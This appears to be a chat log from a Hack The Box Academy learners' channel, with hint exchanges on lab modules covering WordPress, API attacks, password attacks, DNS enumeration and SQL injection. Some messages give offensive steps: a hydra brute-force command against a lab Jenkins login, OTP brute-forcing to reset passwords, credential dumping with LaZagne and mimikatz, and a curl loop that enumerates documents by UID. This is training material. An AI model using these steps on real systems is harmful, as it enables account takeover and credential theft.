Like, I recursively grepped for HTB{ and it didn't come up either, so ... maybe it's zipped?
shouldn't need to recursively grep
right, I was trying to find it another way
if you looked at the solution then you should see that it's directly in the file
I only glanced, I don't want to spoil it fully
it's not zipped, at all
if you saw what the vulnerable plugin is then that's a good basis to start your search
Google is OP
well I'm going to start with the one that looks horribly broken
i was able to find it knowing the very little info from a glance at the plugin it mentioned (if you don't know the plugin, then instead of trying to tackle them each look through for ones that are unauthenticated file downloads/file downloads)
im confident I'll get this now that I have a different perspective on this
as a general rule of thumb: if what you're doing isn't working, then you need to do something different. Getting tunnel visioned on something is an easy way to skip over other stuff
no, that isn't my issue
Build up your methodology to keep you from tunnel visioning too much
let me figure this out, and after that if I still feel as I do I'll DM you why
you were tunnel visioned. you can't say that you weren't lol
👆
and my dms aren't open, sorry, maybe if in 12 hours you're still having problems
but it's late and I need sleep. Got some phone calls to make
I see now why that question is worded exactly how it is worded. For the future searcher out there who gets stuck on "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download." within the "Hacking WordPress" Skills Assessment for the same reasons I did, what would have worked for me:
- Put the question entirely out of your mind. Pretend you never read it.
- Make it more vague, like, "Use a vulnerable plugin to retrieve data while unauthenticated."
- Re-read the hint.
I'm working on the API Attacks module on Hack The Box Academy. It's a really great module, but I'm stuck on one question despite solving the rest. Can anyone help me with the solution for 'Submit the header and its value that expose another Security Misconfiguration in the API?'
hello everyone, hope you are doing good, I am blocked at the Credential Hunting in Windows from the penetration job role path - I am using LaZagne.exe but it only gives me the WinSCP password and username - I have tried to open each browser to look for the password, but those I have found do not work. Note: I am running LaZagne in Administrator mode but it does not find the rest. PLEASE HELP
I have used the browser, sysadmin, and all commands but nothing
Hello everyone I am stuck with the API Attacks Broken Authentication room https://academy.hackthebox.com/module/268/section/3062
Follow the same methodology as shown in the section, just with the roles you are given in this account.
Following the methodology did not lead me to the password for the customer email MasonJenkins@ymail.com
Is there is any write up about this or any hint about it
In Web fuzzing, recursive fuzzing stuck on this only question. All others completed but wasn't able to get a flag of this. Can I DM anyone please?
Hello good morning. May I have help on the Introduction to red teaming AI. Anyone done this module ?
Hello everyone I am stuck with the API Attacks Broken Authentication room https://academy.hackthebox.com/module/268/section/3062
Actually u can do as content in this section:1. use creds search mysql in ur own machine 2. u'll find not much credentials, so connect mysql in target machine with these credentials
request a OTP for the user and brute force it, then reset their password
as is outlined in the section
what is the length of the otp 4 or 5 ?
what do you mean
Hey guys, anybody passed recently "Skills Assessment - Password Attacks". I mean recently? (nexura administrator NTLM question)
I got the windows credentials from the SSH host, connected to the JUMP01, got the "online user password.xlsx" (or the similar name of the file)
But there is no passwords in it.
I literally see no other options to go, except to start bruteforcing other domain users, but bruteforcing is a bs approach, because it can take 1 minute or 3 years.
Any hint?
The things you find in C:\Temp\unattended2.xml is unrelated to the lab activity.
Can the Jump server reach/access anything else that is related to a section from module?
yup, domain controller
hi im trying out the jenkins discovery and enum, this is sort of out of scope of what is being taught but
hydra -l admin -p admin -s 8000 jenkins.inlanefreight.local http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign in:F=loginError" -v -I
i have tested the password and username to be correct but for some reason hydra cannot detect it
I would recheck your access.
Would that mean, that there might be other hosts on the 172.16.119.0 sub? Interesting. Will check.
The scenario gave you all hosts within scope, so I'd just reread that if you are looking to identify other hosts within the network outside of the DC and Jump server.
If you mean the file01 share server, there is nothing interesting there, as I wrote. Except for that "online passwords xlsx" file, but it's a scam, no passwords. There. I could start bruteforcing the other shares that my domain user doesn't have access to, but I'm dubious if that makes sense.
Might want to review the network shares section.
okay, so there is a simple question in the linux fundamentals thingy, and the man page gives a simple answer
but the module does not accept the answer
wtf, what do now?
you can DM me
Hey everyone,
working on the Active Directory module, and every time I connect to the Linux attack machine using xfreerdp, the RDP session disconnects after about a minute (sometimes just a few seconds). After it drops, I have to wait a bit before I can start a new session (and when it's working it is very very slow..). Does anyone know why this happens or how to fix it?
You can try the recommended steps outlined in the last section called Using Resource effective RDP commands from here:
https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn
Hey, anyone has issues spawning academy targets?
looks good atm
thanks, but most of the flags don't work at all... I did do with
xfreerdp /u:username /p:password /v:TargetIP /cert-ignore /dynamic-resolution
but still... after a bit the connection is lost
is it supposed to be like that? (and also very slow)
Did you try adjusting MTU?
At Introduction to windows cmd line tools, skill assesment last question, i seem to get the right solution but it keeps telling me wrong flag
Can anyone double check my powershell cmd or verify my solution?
Same is happening to me right now, as well
On the Win Attk/Def Module, though, but same thing is happening; I can't manage to make any meaningful connections via rdp to the kali machine, and I can only establish connection once then it permabreaks, and I have to keep resetting targets
exactly... for example I need to run bloodhound on the remote linux machine but can't do much because it's so slow and I have to reset it every couple of seconds 🙁
Aye; I'm pretty much dead in the water too, cant continue further because of it lol
Having to use a vm to rdp to one machine, then rdp from that machine to another machine...it dont work 
I'd love to just bypass this section because I understand what its wanting me to do (PrintBug section), but I cant...and like you, am stuck.
Just checked my target time, I'm already hour three into this too lmao
:((((((((
The "cant connect" issue doth continue
Hello Everyone I am stuck here, there is no provided email that I can work with. How do I get this
https://academy.hackthebox.com/module/268/section/3064
Most of the time, I need to use SSH and not RDP, but even that is annoying because it’s super slow and always gets stuck, and when it does I have to reset it
Aye, Ive tried to ssh on this one too and Im getting such a slow connection even via parrotbox and not my own kali machine; if it even works
I very much relate

yeah it's annoying
Anyone know of any issues with connection for USA? Trying to do Attacking Jenkins but I can't seem to load the website, even with vHost in etc/hosts
You dont need an email, you just need to use the API to cause another resource consumption issue, and itll give you the flag iirc
could you explain more
Just got this from VPN - tried to restart it.... Anyone else having weird issues?
You should be able to use the previous user you have been operating as, and then manipulate a call in the API to cause a bunch of requests to happen unmitigated
I already did that but it gives me error encountered
How do you mean, and where?
Disregard - took a couple of restarts, but all is good now
Could I DM you ?
Sure
Solved 💜
@spiral geyser the bash module is above tier 0, consider other ways of counting characters. Its expecting you to not use built-in things. Follow the example using echo
Has there been any news on what might happen between letsdefend and HTB Academy? I'm curious if I should hold off and see if it gets merged into HTBA.
Hello all. I work on the api attacks / Unrestricted Resource Consumption. It seems that I need a customer mail but I only have a supplier role. I dont see how to get this email. What do I miss ?
Nothing yet
Is HTB planning a cert to compete with Offsec's OSWP? 👀
I see all those new modules got added
There is a job role path for Wi-Fi. It is therefore to be expected that an exam will follow.
Bless, looking forward to it. 
You can already study all the modules.
Kinda stuck on Sql Injection Fundamentals: Skills assessment. I'm on the second question "What is the root path of the web app?" I have an HTTP response with the info I presume I would need (see question hint) but there isn't any file path that works nor looks correct (compared to what Im used to). Any input is appreciated
you can DM me if you need help
I have started 🤣
Hi all, I'm having issues with the AI Data Attacks - (4) Trojan Attacks - Training the models. It's saying I'm missing the forward function but I'm following along to the best of my ability and I don't believe I missed anything. Any ideas?
hello, im stuck on Skills Assessment - SQL Injection Fundamentals, tried all payloads in the book but not working 🙂
Hey team so I'm in the skill assessment of Password Attacks, I'm trying to bruteforce the username with HYDRA using betty, jayde and nexura as my candidates. so far I'm not reaching anywhere and only the ssh port is the one that's open .. am I on the right path ?
Why nexura? Also, just use a username list created via usernameanarchy
Not sure how you arrived at only 3 candidates when no other info is given in the brief
nexura is the company name first i tried with betty jayde then after no results i added the companies name
Username anarchy is your friend :)
In the footprinting module I do not understand the question about FQDN of last octet ends with "x.x.x.203"
How do we get this record? Neither of the hosts enumerated via zone transfer seem to have a record for it in DNS.
Then try a different one :) a base dig should give you a bunch of subdomains to try.
Don't try what you've already dug though
None of them seem to yield anything
I guess that's why it teaches the bruteforce tactic with the 1million list or whatever.
I really don't get this question at all.
Start small go big. The answer may not lie in the 1million lists
dude I already helped you
If not discoverable via dig axfr response nor bruteforce attempt with subdomains what really is left ?
Ty for the message I got it tho
SORRY I MEAN THIS ONE
NOW ME IS THE ONE WHO NEED HELP
So, was browsing for help on the HTB forums and stumbled upon an article that's paywalled, but labeled CPTS Flags - not sure if there's relevant information for the exam or not. Not sure where to report
Dude calm down holy
hold on let me cook
Just worth noting I suppose for PRTG Network Monitor I wasn't able to get the command working with the Notification. Tried it a couple of different ways, but wasn't appearing to create a user? Did find a metasploit module that worked for it, but definitely feels like I cheated. Not sure if something was weird with that specific box or it's user error
What's the contents of table flag5? (Case #5)
SQLMap Essentials Attack Tuning
i just searched and find this
http://157.245.33.77:30661/case5.php?id=1
now i dont understand how could i know that i need to put the ?id=1 on there how
https://academy.hackthebox.com/module/58/section/526
i really need help
you can DM me
guys
in this section they want me to find the correct http method
I used a list of methods and none of them work
wtf
no I am still studying it as you can see
I did not skip that
Hello everyone, I can't find the VirusTotal section in The hive. Who can tell you?
I found it
Hello all. I'm blocked on the API attacks / Unrestricted Resource Consumption question. I need to find a customer email. I fuzzed everything to find files (with and without extension, different wordlists), tried every api but I've been stuck for 2 days on this. Any help ?
it's bruteforceable; the problem is you may be looking at something you already attacked instead of looking for something new
also it IS discoverable by dig axfr... if you add some stuff to your hosts file :) just a bit more longwinded to do it that way than use the dnsenum tool provided
well axfr might not be the right one, but all the dnsenum tool (essentially) is something like dig {word fromlist}.do.main @DNSIP
Conceptually I must be missing something, @fathom pendant
I recognize the horizontal thinking required to solve such issues but I find the manner in which dig responds to various hostnames to be quite odd and unclear to me.
For instance if it's dev.freightwhateveritis.htb
Dig asks for records from a nameserver
Thats why you have to specify the nameserver, since its private
Right, so we iterate over the namelist in hopes we find a match.
So obviously need to iterate over $i.<something>.<freightWhateverItIs>.htb
Yep, iirc you may be able to use the target ip as the name server
But it could require adding it to your hosts file.
Why would that matter though
Everything you see in a lookup is relative to the server
Why do you need to rely on your local resolver if, at the end of the day, the vpn configuration clearly can resolve the host anyway
That's a fundamental misunderstanding
Oh wait, the target isn't a hostname, it's an IP.
Resolving the host, in this instance, would be translating inlanefreight.htb to the ip
The spirit of my comment above was more to do with exactly that though: why would that matter.
But you dont need to add anything to your hosts file for dnsenum though
app.inlanefreight.htb and internal.inlanefreight.htb may be on the same ip, say 10.129.50.50, when you send a request to the server without setting the hostname (such as an http request) - if you just use the IP, the server doesn't know which one to serve you
Similarly the ns records, say you need the dns for a subdomain thats ns.something.htb, if you dont tell the nameserver what you're looking for - it doesnt know what to serve you, and serves a default answer
There is an endpoint that wants an email. Try using the username email format you are given to authenticate to endpoints as a baseline starting point.
Or ns.something.inlanefreight.htb
Wow
That makes a lot of sense in a very realistic way.
I'm looking at it from the opposite perspective as an admin. But what you've said makes a lot of sense now.
Hi all. I am having issues with the finding evil module. I cannot move calc.exe to the desktop. I have tried with an administrative cmd prompt but to no avail. Please advise.
hey, I'm doing active directory modules and I have loaded tickets into memory, now the module says to extract the tickets using mimikatz, but the command pictured here doesn't work, I'm not sure if this is how you use mimikatz?
what exactly "isn't working" ?
when parsing the commands for mimikatz; it's everything after the mimikatz # that's the command meant to be used
yes the commands shown are being run from an interactive mimikatz session
ok, wasnt that clear for someone who has never run mimikatz before 🙂 thanks
it seems like the method for using kirbi2john.py is no longer necessary/working in the section "Kerberoasting from windows" in the active directory enumeration and attacks module. you can just use kirbi2john.
Are there mods I can ask questions to on syntax? I am stuck on final question of SQL Injection Fundamentals: Skills Assessment. I really don't know what I could be doing wrong for the final question but I guess that's the point of the assessment lol.
I figured it out but now I have more questions if anyone can answer 😆
yes
what do you mean the syntax they just need the content of the file
I meant my syntax and also method of sending SQL queries. I'm not sure if I'm allowed to talk about exactly what I did here (I'm scared of getting yelled at lol)
The SQL Injection Fundamentals module is tier 0, which means you can post content from it. Just don't post any answers or how to get the answers.
Ok here is my question then (and delete if not allowed)
Are HTTP response codes reliable for SQL injection? I was relying on them (maybe too heavily) for a bit and figured my queries only ran if I got a 200 or 302 type of response. One question I kept getting 500 thinking it failed not knowing it was working the entire time. Is there something specific that causes certain queries to return error codes?
hello everyone
can anyone tell me about the sudo password of htb. if i run the sudo su command then which password do i need to write
your own user's password
for a simple sudo command, and if i wanted to connect through ssh to spawn the target, do i need to write the spawning password or the sudo password? for example: if i am in nixfund and i wanted to go into the sudoers file i write sudo cat sudoers, then what password do i need to type
bro can you tell me that this password is present in my_credential file below the username
????
the command 'sudo' uses your own user's password, whatever user you're logged in as
don't ever show that password
ok thanks bro
that's the pwnbox so i'd assume it's the pwnbox password for your user
but idk i don't really use the pwnbox
ok
you don't need to run around the system as root; anything that requires elevated permissions just use sudo
sudo -> switch user and do, if you don't specify a user it assumes root is the user you want to run as
thanks bro now i understand
https://academy.hackthebox.com/course/preview/intro-to-academy ; this module is helpful for learning how to interact with academy
I was working on a section to find who can PSRemote, and it seems you can use bloodhound for this, but does a more efficient method exist? For example, I could query each computer for local group "Remote Management Users" to see if domain/Remote Management Users exist, or maybe even check the GPO?
You can do this with LDAP
Or netexec
So if you have the credentials, I know you can enumerate hosts with, for example, netexec winrm ..etc, and you can also query members directly from the "Remote Management Group", but I wanted to know if you could actually find the computer without querying them all.
So you want to find out if a user is in the computers remote management users group without querying the computer?
They are in the domain group, Remote Management Users, but each computer has a local group as well. It seems very noisy having to query every computer on a network.
If you want to see what is in a computers local groups you are going to have to query that computer
If you want to reduce noise like for a red team engagement you will have to make informed targeted queries over longer time
But if it's not a red team just bloodhound that bad boy
hello just quickly regarding HTB new UI, I cant see advanced search for retired machines, am I blind or is it just not there??
This DNS shit man..
hello i have a problem 🙁
These modules need to explain better.
you don't need a high overview of how dns works to complete the module
gggggggggggggg
I'm in this Burp Suite: Intruder module, trying to get a username and password from a filtered list. Basically, I have to make the request on the website, then go to Burp Suite, send it to Intruder, clean the dollar signs, enter them one at a time in the username and password fields, then in Payloads, load the extracted username.txt file into the username field, and the same for the password.txt file. I just need to load the passwords, make sure it's set to pitchfork attack type, and send the attack. The problem is that when it should give me the length, they all have the same 679, and that's an error.
I'm just continually getting my ass kicked, pissing time away and not learning though.
Hi, thanks for the help. This is already done. I'm authenticated but no way to find a customer email.
i don't recall that at all from the intruder portion of the web proxies module
its premium
With the DNS footprinting stuff, I've amassed a list of various hostname subdomains which -- i suppose -- can themselves be targets of bruteforcing. I've placed them all in a file and I read them out in a while loop, wrapped dnsenum into them, and then ran one of the '...million' lists on top.
?
this section right? https://academy.hackthebox.com/module/110/section/1054
this
My advice would be to take a break and then refer to the diagram/graphic in the section of the Footprinting module
wrong server
Maybe it's just a matter of altering the script so it can iterate over all the lists.
I use both to learn forgiveness
are you still stuck on the x.x.x.203?
banned for being a THM user, sorry i don't make the rules (THIS IS A JOKE)
Yea the ...203 stuff is kicking my ass.
i said earlier: stop using the top-1million list
start with the smaller lists there's a ||fierce|| one if you want me to be more direct with the hint
lol I promise my next question will be about HTB
can someone give me nudge on server-side attack skills assessment please?
you're asking the server for {wordlist}.sub.do.main 😉
brutal
i believe i gave you that format earlier; i'm assuming you've just been trying {wordlist}.do.main
module is above tier 0; don't spoil info - there's a reason i've been vague
your hostlist is missing an entry btw @hardy kestrel
also ask before sending a dm
dm please
Please bring back advanced search 
this isn't relevant to academy 😉
can someone help me in section https://academy.hackthebox.com/module/134/section/1186
I can not find any files
the hint tells you to not just look for pdfs
yes
that would be why
no I mean
it also loads even if it is not running
it just keeps loading
so I can not find the endpoint that I can get files from
because burpsuite is intercepting the request :)
Are you still stuck?
no it is not intercepting and it is just loading for 5 minutes
try resetting the target, if that doesn't work reach out to support
no I helped him
it is like that from yesterday
http://94.237.123.185:40922/documents.php?uid=4 for example this is just loading
Alright! Thank you!
even if I change the number
ah looks like it's an issue with that module atm; it's already been reported in #1234357888114364508
I used katana to find some endpoints, found an endpoint that can take a number.. in the section they say look at the first 20 numbers, I did that but the file always does not exist
after about a few minutes it should load
hmmm okay
not sure why you used a tool tbh the module kinda walks you through a fair bit of it 😉
I thought maybe I can get another endpoint or something
okay then I will move on to the next sections
the issue you're facing may be a more simple one
it's expecting a POST request, not a GET request; so the curl will be different
if the server is down then he is down
GET -> somewebsite/page.php?param=value
Post -> somewebsite/page.php
[Headers here]
param=value
I hope it is not going to be down in the exam
oh worked
so I don't understand is it down or what
it's not down
oh so I am down then
it's just a browser issue (it's trying to connect to something that is down, the fontcache)
but cURL doesn't care about fonts
I don't care too
yes, but the webpage does if you're using a browser
i mean the main thing you really need to know is inspecting the request to the endpoint to see how to form your cURL for grabbing files
no need for burp to intercept it
I just click on buttons and it does not work that's what I know
and that is my job
clicking buttons till I found the flag
then you're not learning
oh maybe I should take the bash scripting module
well the module provides a sample script you can use/modify
yesterday I solve 2 CTF on THM since I don't have sub on HTB
you just proved you're not by the response of 'i just click buttons and it doesn't work... clicking buttons until i find the flag'
am not good with bash you know
you don't have to be
the module gives you an (almost) perfect script to use. It just doesn't check for any other extensions besides pdf
and it uses a GET request instead of POST
if you want to learn figure out what that script is actually doing
curl -s "$url/documents.php?uid=$i" here I have to put -X POST right
I know but why remove it 😭
did not work
refer to my GET vs POST examples above, with POST your parameters aren't in the URL
hmmm.. you are right
you need to supply data for a POST command, i suggest messing with CURL first before adjusting the script
Hi, I am currently in the wordpress hacking module and I did the following qn in the directory indexing part: Keep in mind the key WordPress directories discussed in the WordPress Structure section. Manually enumerate the target for any directories whose contents can be listed. Browse these directories and locate a flag with the file name flag.txt and submit its contents as the answer.
While I managed to find the file, I had to look through each plugin individually. Is there a faster way to do this? I tried writing scripts and using gobuster but to no avail
i believe wpscan can do it but i could be wrong.
I got just pdf files
they say you need txt
look at the script and think what you can modify for txt files, or any other 3 letter extensions
I suggest looking into and learning regex
I think I could just do it with ffuf to get the flag
nope
there's a very simple reason you can't
what is it
the flag file isn't a standard name
I can use the flag -fr
also -fr is filter out
who cares I can filter any pdf files
you want -mr
then I will get txt
that's also if the file is on the page you're viewing
aka it'd have to be in the href of the page...
it is
yes
so I can get it with ffuf
are you fuzzing with a list 1-20; on just /documents?
because that... that really won't get you much as it'll hit every UID
I already got the flag but I will try again now
not only is it better, for the most part, it also has the added benefit of allowing you to download files
the module provides a bash script, you can learn from that
you can also take the intro to bash scripting module
yes but I have to do things with it like change the method
i generally suggest the Information Security Foundations skill path before CWES
even when I did it just got the pdf files
it's really... not that hard
hmmmmmmmm
you already did it with a singular curl command a minute ago
break things down to their essentials
oh the page that has the flag has also pdf
correct
^ also literally what i said earlier
and you also likely used the wrong flag with ffuf
-f[option] -> Filter Out (don't include)
-m[option] -> Match (include)
again though breaking down the bash script given to you can help you learn a bit more
python you'd have to learn the beautifulsoup4 library to download files
can't I just use requests and filter for txt?
oh that's pain
I don't want to be a hacker this week I quit
i suggest going back to the fundamentals; https://academy.hackthebox.com/path/preview/information-security-foundations
seems I did 40% of it
hmmm
should I stop the CWES path and do it then?
if you want to have strong fundamental skills to build on, absolutely
and also give you more time to give me a discount on the exam voucher
sound good
I mean there is a new cert next month right?
tell me
please
Oh
I was tryna make a bash script but it failed miserably
for end in $(cat directory.txt); do (curl -s -X GET http://94.237.122.188:58422/$end | html2text); done
How do u make it list all the available files?
you should do a post request I think
in the directory
you need to send a POST request with the UID
it is not a directory you should send a UID to get files
But isn't post req to send something or change/update something in the web server
nope
tell me
Oh
it means give me something
you're thinking of apis with CRUD (Create, Read, Update, Delete)
yes yes yes
POST just means you're sending data to the server instead of getting data from the server
do I need to do the windows fund for the CWES???
you're sending your request THROUGH the POST
it's still good to know, what if you get a webapp that is windows rce 
easy
I will google it
as I always do
I did not study PHP and I can not make a reverse shell I just google it
that's just poor planning, why spend time Googling when it's already available in your notes
I study nodejs with express
what if a revshell isn't the goal
yes you are right
:)
you still need a professional report, you can't just click your way to win
💔
Please God have mercy on me
okay then I will do that path first
but I also need to study PHP
all the labs made with PHP
And Understanding the vulnerabilities gets you one step closer (to the edge) to being able to properly tell someone how it works and how it can be mitigated/fixed
that's lame I have only 5 modules to complete the CWES Path. but it does not matter if I can't pass the exam
https://academy.hackthebox.com/preview/certifications/htb-certified-web-exploitation-specialist/certification-steps 😉 just make sure your notes are good, and when doing the exam, note down everything you do/try
can you tell me if there is a discount on the voucher soon
please

i know as much as anyone else does
I don't think so

you are an importer
hmmm
fine then
mods don't get early access to any bit of news
and even if we did, NDAs are a thing
well... yeah... the one relating to the wi-fi job path...